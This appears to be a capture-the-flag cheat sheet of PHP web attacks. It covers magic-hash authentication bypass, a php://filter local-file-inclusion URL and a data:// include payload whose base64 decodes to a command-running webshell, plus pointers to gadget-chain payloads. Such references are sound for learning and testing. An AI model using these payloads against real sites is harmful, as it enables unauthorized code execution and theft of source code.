PHP

• Magic Hashes - CheatSheet

  In PHP, the == applies type juggling, so if the hash starts with 0e, then the hash will be evaluated as 0 (scientific notation). This can be used to bypass authentication.

  Since 1/256 hashes have this property, it is relatively easy to bruteforce strings with selected characters.

  example: md5("240610708") = 0e462097431906509019562988736854

• preg_replace - Manual

  A bug in older versions of PHP where the user could get remote code execution

• phpdc.phpr - GitHub

  A command-line tool to decode bcompiler compiled PHP code.

• php://filter for Local File Inclusion - Website

  A bug in PHP where if GET HTTP variables in the URL are controlling the navigation of the web page, perhaps the source code is include-ing other files to be served to the user. This can be manipulated by using PHP filters to potentially retrieve source code. Example like so:

  http://example.com/index.php?m=php://filter/convert.base64-encode/resource=index

• data://text/plain;base64

  A PHP stream that can be taken advantage of if used and evaluated as an include resource or evaluated. Can be used for RCE: check out this writeup: https://ctftime.org/writeup/8868

  http://dommain.net?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=

• PHP Generic Gadget Chains - GitHub

  Payloads for Object injection in unserialize on different frameworks.